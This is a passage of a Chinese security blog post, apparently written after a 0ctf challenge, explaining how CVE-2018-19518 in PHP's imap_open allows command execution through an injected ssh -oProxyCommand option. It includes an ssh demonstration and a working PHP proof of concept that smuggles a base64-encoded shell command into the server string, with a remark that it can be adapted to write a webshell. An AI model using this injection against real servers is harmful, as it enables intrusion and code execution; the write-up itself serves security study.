<h2 id="利用imap-open-CVE-2018-19518"><a href="#利用imap-open-CVE-2018-19518" class="headerlink" title="利用imap_open (CVE-2018-19518)"></a>利用imap_open (CVE-2018-19518)</h2><p>php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh来代替rsh的功能（也就是说，在debian系列系统中，执行rsh命令实际执行的是ssh命令）。<br>因为ssh命令中可以通过设置<code>-oProxyCommand=</code>来调用第三方命令，攻击者通过注入注入这个参数，最终将导致命令执行漏洞。</p>
<p><strong> ssh的-oProxyCommand 参数 </strong><br>SSH 命令中用到了许多命令，其中我们可以使用 -o 参数来设置连接期间可用的各种选项。在建立SSH连接之前，我们可以设置 <code>ProxyCommand</code>参数，如下所示：<br></p><figure class="highlight sh"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">qiyou@ubuntu:~/<span class="built_in">test</span>$ ls</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/<span class="built_in">test</span>$ ssh -oProxyCommand=<span class="string">"touch test.txt"</span> 192.168.1.123</span><br><span class="line"></span><br><span class="line">ssh_exchange_identification: Connection closed by remote host</span><br><span class="line"></span><br><span class="line">qiyou@ubuntu:~/<span class="built_in">test</span>$ ls</span><br><span class="line">test.txt</span><br></pre></td></tr></tbody></table></figure><p></p>
<p>可以发现即使是ssh连接失败了，但是命令还是执行了。</p>
<p><code>CVE-2018-19518</code>的环境可以直接使用vulhub上的环境：<a href="https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518" title="链接" target="_blank" rel="noopener">链接</a></p>
<p>直接上poc<br></p><figure class="highlight php"><table><tbody><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$exp = <span class="string">"echo test!test! &gt; /tmp/test"</span>;</span><br><span class="line">$base64_exp = base64_encode($exp);</span><br><span class="line">$server = <span class="string">"x -oProxyCommand=echo\t${base64_exp}|base64\t-d|sh}"</span>;</span><br><span class="line">imap_open(<span class="string">'{'</span>.$server.<span class="string">':143/imap}INBOX'</span>, <span class="string">''</span>, <span class="string">''</span>) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"\n\nError: "</span>.imap_last_error());</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></tbody></table></figure><p></p>
<p>执行一波，可以发现执行成功了，要想写webshell的话直接把我们的exp改一下就ok了，这里就不多赘述了<br></p><figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330100258-f0e06182-528f-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure><p></p>
<h1 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h1><p>被0ctf锤哭了，膜RR师傅Orz，比赛的时候没有做出来，赛后没有时间复现，等到想要复现的时候环境已经关了，只能是本地复现了，顺便总结了一下。</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190330134911-8ad0aa9e-52af-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html" title="https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html" target="_blank" rel="noopener">https://www.tr0y.wang/2018/04/18/PHPDisalbedfunc/index.html</a><br><a href="https://www.jianshu.com/p/137ae1400337" title="https://www.jianshu.com/p/137ae1400337" target="_blank" rel="noopener">https://www.jianshu.com/p/137ae1400337</a><br><a href="https://blog.csdn.net/haoel/article/details/1602108" title="https://blog.csdn.net/haoel/article/details/1602108" target="_blank" rel="noopener">https://blog.csdn.net/haoel/article/details/1602108</a><br><a href="https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php" title="https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php" target="_blank" rel="noopener">https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2019-05-14T16:29:14.999Z" itemprop="dateUpdated">2019-05-15 00:29:14</time>
</span><br>


        
        know it then hack it
        
    </div>
    
    <footer>
        <a href="https://byqiyou.github.io">
            <img src="/img/avatar.jpg" alt="">
            
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/一些姿势/">一些姿势</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&title=《Bypass-disabled_functions一些思路总结》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&title=《Bypass-disabled_functions一些思路总结》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Bypass-disabled_functions一些思路总结》 — 七友&url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/04/09/运用Scapy编写类似于Nmap的端口扫描脚本/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">运用Scapy编写类似于Nmap的端口扫描脚本</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/02/16/xss总结/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">xss总结</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'true';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>




<section class="comments" id="comments">
    <!-- UY BEGIN -->
    <div id="uyan_frame"></div>
    <script src="http://v2.uyan.cc/code/uyan.js?uid=true"></script>
    <!-- UY END -->
</section>
















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        Thinks
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/2.png" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/2.png" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span> &copy; 2018 - 2019</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&title=《Bypass-disabled_functions一些思路总结》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&title=《Bypass-disabled_functions一些思路总结》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《Bypass-disabled_functions一些思路总结》 — 七友&url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://byqiyou.github.io/2019/04/04/Bypass-disabled-functions一些思路总结/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = 'Leave';
            clearTimeout(titleTime);
        } else {
            document.title = 'Come back';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
